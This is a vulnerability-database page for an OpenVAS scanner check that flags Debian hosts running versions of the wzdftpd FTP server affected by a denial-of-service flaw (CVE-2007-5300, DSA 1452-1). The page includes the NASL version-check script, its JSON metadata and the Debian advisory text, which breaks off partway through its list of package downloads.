Search...

Debian Security Advisory DSA 1452-1 (wzdftpd)

2008-01-17T00:00:00

ID OPENVAS:60107
Type openvas
Reporter Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
Modified 2017-07-07T00:00:00

Description

The remote host is missing an update to wzdftpd announced via advisory DSA 1452-1.

                                        
                                            # OpenVAS Vulnerability Test
# $Id: deb_1452_1.nasl 6616 2017-07-07 12:10:49Z cfischer $
# Description: Auto-generated from advisory DSA 1452-1 (wzdftpd)
#
# Authors:
# Thomas Reinke &lt;reinke@securityspace.com&gt;
#
# Copyright:
# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com
# Text descriptions are largerly excerpted from the referenced
# advisory, and are Copyright (c) the respective author(s)
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2,
# as published by the Free Software Foundation
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
#

include("revisions-lib.inc");
tag_insight = "k1tk4t discovered that wzdftpd, a portable, modular, small and efficient
ftp server, did not correctly handle the receipt of long usernames.  This
could allow remote users to cause the daemon to exit.

For the stable distribution (etch), this problem has been fixed in version
0.8.1-2etch1.

For the old stable distribution (sarge), this problem has been fixed in
version 0.5.2-1.1sarge3.

For the unstable distribution (sid), this problem has been fixed in version
0.8.2-2.1.

We recommend that you upgrade your wzdftpd package.";
tag_summary = "The remote host is missing an update to wzdftpd
announced via advisory DSA 1452-1.";

tag_solution = "https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201452-1";


if(description)
{
 script_id(60107);
 script_version("$Revision: 6616 $");
 script_tag(name:"last_modification", value:"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $");
 script_tag(name:"creation_date", value:"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)");
 script_cve_id("CVE-2007-5300");
 script_tag(name:"cvss_base", value:"5.0");
 script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_name("Debian Security Advisory DSA 1452-1 (wzdftpd)");



 script_category(ACT_GATHER_INFO);

 script_copyright("Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com");
 script_family("Debian Local Security Checks");
 script_dependencies("gather-package-list.nasl");
 script_mandatory_keys("ssh/login/debian_linux", "ssh/login/packages");
 script_tag(name : "solution" , value : tag_solution);
 script_tag(name : "insight" , value : tag_insight);
 script_tag(name : "summary" , value : tag_summary);
 script_tag(name:"qod_type", value:"package");
 script_tag(name:"solution_type", value:"VendorFix");
 exit(0);
}

#
# The script code starts here
#

include("pkg-lib-deb.inc");

res = "";
report = "";
if ((res = isdpkgvuln(pkg:"wzdftpd-dev", ver:"0.5.2-1.1sarge3", rls:"DEB3.1")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-mod-perl", ver:"0.5.2-1.1sarge3", rls:"DEB3.1")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-back-mysql", ver:"0.5.2-1.1sarge3", rls:"DEB3.1")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd", ver:"0.5.2-1.1sarge3", rls:"DEB3.1")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-mod-tcl", ver:"0.5.2-1.1sarge3", rls:"DEB3.1")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-back-mysql", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-mod-tcl", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-back-pgsql", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-mod-avahi", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-dev", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}
if ((res = isdpkgvuln(pkg:"wzdftpd-mod-perl", ver:"0.8.1-2etch1", rls:"DEB4.0")) != NULL) {
    report += res;
}

if (report != "") {
    security_message(data:report);
} else if (__pkg_match) {
    exit(99); # Not vulnerable.
}

JSON Vulners Source

Initial Source

{"href": "http://plugins.openvas.org/nasl.php?oid=60107", "history": [{"lastseen": "2017-07-02T21:10:10", "differentElements": ["modified", "sourceData"], "edition": 1, "bulletin": {"href": "http://plugins.openvas.org/nasl.php?oid=60107", "history": [], "naslFamily": "Debian Local Security Checks", "id": "OPENVAS:60107", "title": "Debian Security Advisory DSA 1452-1 (wzdftpd)", "description": "The remote host is missing an update to wzdftpd\nannounced via advisory DSA 1452-1.", "published": "2008-01-17T00:00:00", "type": "openvas", "bulletinFamily": "scanner", "hashmap": [{"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "f842692ab53369d99f0bb146b500eaec"}, {"key": "pluginID", "hash": "178b515e6825d004ebaf232dd6977ccd"}, {"key": "description", "hash": "9eff76ff2de13019555a9548a0975a71"}, {"key": "sourceData", "hash": "3ba0a772fcf83181fa543add6751d64e"}, {"key": "href", "hash": "d8fe91a26c78440292c5175636578552"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}, {"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "cvelist", "hash": "a0646130fe284a85948677719f5d4b06"}, {"key": "reporter", "hash": "244cbbd9c3f044aa5d0644924a7459d1"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "published", "hash": "d50ef4187c812efcd7df8d6f70c1cb0e"}, {"key": "title", "hash": "92ef21841c6649d367f72b960a4805fa"}], "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1452_1.nasl 3907 2016-08-30 05:36:48Z teissa $\n# Description: Auto-generated from advisory DSA 1452-1 (wzdftpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"k1tk4t discovered that wzdftpd, a portable, modular, small and efficient\nftp server, did not correctly handle the receipt of long usernames. This\ncould allow remote users to cause the daemon to exit.\n\nFor the stable distribution (etch), this problem has been fixed in version\n0.8.1-2etch1.\n\nFor the old stable distribution (sarge), this problem has been fixed in\nversion 0.5.2-1.1sarge3.\n\nFor the unstable distribution (sid), this problem has been fixed in version\n0.8.2-2.1.\n\nWe recommend that you upgrade your wzdftpd package.\";\ntag_summary = \"The remote host is missing an update to wzdftpd\nannounced via advisory DSA 1452-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201452-1\";\n\n\nif(description)\n{\n script_id(60107);\n script_version(\"$Revision: 3907 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2016-08-30 07:36:48 +0200 (Tue, 30 Aug 2016) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-5300\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1452-1 (wzdftpd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"HostDetails/OS/cpe:/o:debian:debian_linux\", \"login/SSH/success\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wzdftpd-dev\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-perl\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-mysql\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-tcl\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-mysql\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-tcl\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-pgsql\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-avahi\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-dev\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-perl\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "pluginID": "60107", "hash": "ad845897b655e024afc5fb6e7b262e28368b117fef26cf93ffa7d26a108c745e", "modified": "2016-08-30T00:00:00", "edition": 1, "cvelist": ["CVE-2007-5300"], "lastseen": "2017-07-02T21:10:10", "viewCount": 0, "enchantments": {}, "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "objectVersion": "1.3", "references": []}}], "naslFamily": "Debian Local Security Checks", "id": "OPENVAS:60107", "reporter": "Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com", "published": "2008-01-17T00:00:00", "description": "The remote host is missing an update to wzdftpd\nannounced via advisory DSA 1452-1.", "title": "Debian Security Advisory DSA 1452-1 (wzdftpd)", "bulletinFamily": "scanner", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1452_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1452-1 (wzdftpd)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"k1tk4t discovered that wzdftpd, a portable, modular, small and efficient\nftp server, did not correctly handle the receipt of long usernames. This\ncould allow remote users to cause the daemon to exit.\n\nFor the stable distribution (etch), this problem has been fixed in version\n0.8.1-2etch1.\n\nFor the old stable distribution (sarge), this problem has been fixed in\nversion 0.5.2-1.1sarge3.\n\nFor the unstable distribution (sid), this problem has been fixed in version\n0.8.2-2.1.\n\nWe recommend that you upgrade your wzdftpd package.\";\ntag_summary = \"The remote host is missing an update to wzdftpd\nannounced via advisory DSA 1452-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201452-1\";\n\n\nif(description)\n{\n script_id(60107);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:23:47 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-5300\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Debian Security Advisory DSA 1452-1 (wzdftpd)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"wzdftpd-dev\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-perl\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-mysql\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-tcl\", ver:\"0.5.2-1.1sarge3\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-mysql\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-tcl\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-back-pgsql\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-avahi\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-dev\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"wzdftpd-mod-perl\", ver:\"0.8.1-2etch1\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "pluginID": "60107", "hash": "0900b5927e135f7e1c8c9a22d71505b74a9fb32de92acfdb76c3f3f9908fc26c", "references": [], "edition": 2, "cvelist": ["CVE-2007-5300"], "lastseen": "2017-07-24T12:49:47", "viewCount": 0, "enchantments": {"score": {"value": 6.1, "vector": "NONE", "modified": "2017-07-24T12:49:47", "rev": 2}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-5300"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1452-1:052B0"]}, {"type": "exploitdb", "idList": ["EDB-ID:4498"]}, {"type": "nessus", "idList": ["DEBIAN_DSA-1452.NASL"]}], "modified": "2017-07-24T12:49:47", "rev": 2}, "vulnersScore": 6.1}, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cvelist", "hash": "a0646130fe284a85948677719f5d4b06"}, {"key": "cvss", "hash": "84813b1457b92d6ba1174abffbb83a2f"}, {"key": "description", "hash": "9eff76ff2de13019555a9548a0975a71"}, {"key": "href", "hash": "d8fe91a26c78440292c5175636578552"}, {"key": "modified", "hash": "d89cc672a6266551218ef8145d1f22e2"}, {"key": "naslFamily", "hash": "74562d71b087df9eabd0c21f99b132cc"}, {"key": "pluginID", "hash": "178b515e6825d004ebaf232dd6977ccd"}, {"key": "published", "hash": "d50ef4187c812efcd7df8d6f70c1cb0e"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "244cbbd9c3f044aa5d0644924a7459d1"}, {"key": "sourceData", "hash": "1caba06195b57200b6b5a04a1e8ce528"}, {"key": "title", "hash": "92ef21841c6649d367f72b960a4805fa"}, {"key": "type", "hash": "47c1f692ea47a21f716dad07043ade01"}], "objectVersion": "1.3", "modified": "2017-07-07T00:00:00"}

{"cve": [{"lastseen": "2019-05-29T18:09:01", "bulletinFamily": "NVD", "description": "Off-by-one error in the do_login_loop function in libwzd-core/wzd_login.c in wzdftpd 0.8.0, 0.8.2, and possibly other versions allows remote attackers to cause a denial of service (daemon crash) via a long USER command that triggers a stack-based buffer overflow. NOTE: some of these details are obtained from third party information.", "modified": "2017-10-19T01:30:00", "id": "CVE-2007-5300", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-5300", "published": "2007-10-09T18:17:00", "title": "CVE-2007-5300", "type": "cve", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "debian": [{"lastseen": "2019-05-30T02:21:29", "bulletinFamily": "unix", "description": "- ------------------------------------------------------------------------\nDebian Security Advisory DSA-1452-1 security@debian.org\nhttp://www.debian.org/security/ Steve Kemp\nJanuary 06, 2008 http://www.debian.org/security/faq\n- ------------------------------------------------------------------------\n\nPackage : wzdftpd\nVulnerability : denial of service\nProblem type : remote\nDebian-specific: no\nCVE Id(s) : CVE-2007-5300\nDebian Bug : 446192\n\n"k1tk4t" discovered that wzdftpd, a portable, modular, small and efficient\nftp server, did not correctly handle the receipt of long usernames. This\ncould allow remote users to cause the daemon to exit.\n\nFor the stable distribution (etch), this problem has been fixed in version\n0.8.1-2etch1.\n\nFor the old stable distribution (sarge), this problem has been fixed in\nversion 0.5.2-1.1sarge3.\n\nFor the unstable distribution (sid), this problem has been fixed in version\n0.8.2-2.1.\n\nWe recommend that you upgrade your wzdftpd package.\n\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- ---------------------------------\n\nSource archives:\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2.orig.tar.gz\n Size/MD5 checksum: 818860 62a4af39801fe581f85cd063c5fc4717\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.dsc\n Size/MD5 checksum: 769 56ce84eafc6683eae084c1edbe5a4567\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3.diff.gz\n Size/MD5 checksum: 8531 80784497bc6ccee3adc676584fe1df75\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_alpha.deb\n Size/MD5 checksum: 294374 3b7e0d4266cdc03f93c1b3734f606287\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_alpha.deb\n Size/MD5 checksum: 49304 c1c1978ecd2b95b805e207e3a245682f\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_alpha.deb\n Size/MD5 checksum: 30788 dd38408c8485348f8bc8164958a04860\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_alpha.deb\n Size/MD5 checksum: 312336 6cb966eb16081a8d5ee88cd77d5ed95c\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_alpha.deb\n Size/MD5 checksum: 31594 2adefb9d0050b4f98d862271bb1f81a3\n\namd64 architecture (AMD x86_64 (AMD64))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_amd64.deb\n Size/MD5 checksum: 47248 f8b780ddb9256ef41b7ea0a8c7e23001\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_amd64.deb\n Size/MD5 checksum: 217964 6de9a4f433f49c2fcbf98b4e445ad793\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_amd64.deb\n Size/MD5 checksum: 286510 0814035329e48155cb473be2b0dd3568\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_amd64.deb\n Size/MD5 checksum: 30964 54692932158750e896d11eda8cda4d2d\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_amd64.deb\n Size/MD5 checksum: 30066 c1bf50b51cfc2e6c2ffb9a98d4d66ee9\n\narm architecture (ARM)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_arm.deb\n Size/MD5 checksum: 29288 e9833e4f4693378b7c989d3540d8ca25\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_arm.deb\n Size/MD5 checksum: 214440 53f72f4bfa1df22bade8f46b4666a2a9\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_arm.deb\n Size/MD5 checksum: 29590 7af9d441be7afc5584783869e7b4ad67\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_arm.deb\n Size/MD5 checksum: 45970 dec5a70db33cdc64bfd4354a9b4dedb3\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_arm.deb\n Size/MD5 checksum: 264860 0a452abd94a4f4f94449bd297bbe93fc\n\nhppa architecture (HP PA RISC)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_hppa.deb\n Size/MD5 checksum: 31272 21683dbdfe11b648f69eeb66b8d1efba\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_hppa.deb\n Size/MD5 checksum: 241864 71474662edd00e4bb55c585ea62883a6\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_hppa.deb\n Size/MD5 checksum: 304622 e9e035c813888e34953bec2512f4d445\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_hppa.deb\n Size/MD5 checksum: 49386 424159100a537a5193df8dd59fde33fe\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_hppa.deb\n Size/MD5 checksum: 31826 099abdd5060b4b86922665aacce5780a\n\ni386 architecture (Intel ia32)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_i386.deb\n Size/MD5 checksum: 271748 d86c9195911c09a5cefc98054995f7e2\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_i386.deb\n Size/MD5 checksum: 202724 3c30c4b8324a67d8ea78a812d701f352\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_i386.deb\n Size/MD5 checksum: 29452 0e52276341af49cfa0bebdade9c82caf\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_i386.deb\n Size/MD5 checksum: 30382 ec1b766825c7b73c6ad2f34e02dfb778\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_i386.deb\n Size/MD5 checksum: 46648 552513b83992c1912c52037c2d5d1820\n\nm68k architecture (Motorola Mc680x0)\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_m68k.deb\n Size/MD5 checksum: 184892 c211f43c1332786c6a6a4ae822598985\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_m68k.deb\n Size/MD5 checksum: 30246 8de2bd0389435283927e5286e627d10e\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_m68k.deb\n Size/MD5 checksum: 29152 8b8bf9d9a50d81d5547e6c209cf72aa9\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_m68k.deb\n Size/MD5 checksum: 262862 581e9f7974f8a876730e1c7bec7174a6\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_m68k.deb\n Size/MD5 checksum: 45346 b4ba8493f6d9f000517299b339e87021\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_mips.deb\n Size/MD5 checksum: 28900 0969c35a9efe9960df3933b79542126a\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_mips.deb\n Size/MD5 checksum: 29746 9e63566dd12845c74d5c5e3cba4488f6\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_mips.deb\n Size/MD5 checksum: 42310 45044c204cabec92529f22bfa3182beb\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_mips.deb\n Size/MD5 checksum: 277160 52efb0e34a8a4efea40da410e146040a\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_mips.deb\n Size/MD5 checksum: 229224 9c67c455d8959f81a0b978ac92e05074\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-tcl_0.5.2-1.1sarge3_mipsel.deb\n Size/MD5 checksum: 29714 8dd2707a21e434d225379ce1f1b0a0f7\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-back-mysql_0.5.2-1.1sarge3_mipsel.deb\n Size/MD5 checksum: 28928 f43cbb789bff9268764f5fb9e3a2cc17\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-mod-perl_0.5.2-1.1sarge3_mipsel.deb\n Size/MD5 checksum: 42194 53b5f7e6eff691afaf62dfd76c865bad\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd-dev_0.5.2-1.1sarge3_mipsel.deb\n Size/MD5 checksum: 229030 51106351fd524b05ae9de559b5172872\n http://security.debian.org/pool/updates/main/w/wzdftpd/wzdftpd_0.5.2-1.1sarge3_mipsel.deb\n Size/MD5 checksum: 277218 59548ada140407ce5b616ccc7bba466b\n\npowerpc architecture (PowerPC)\n\n 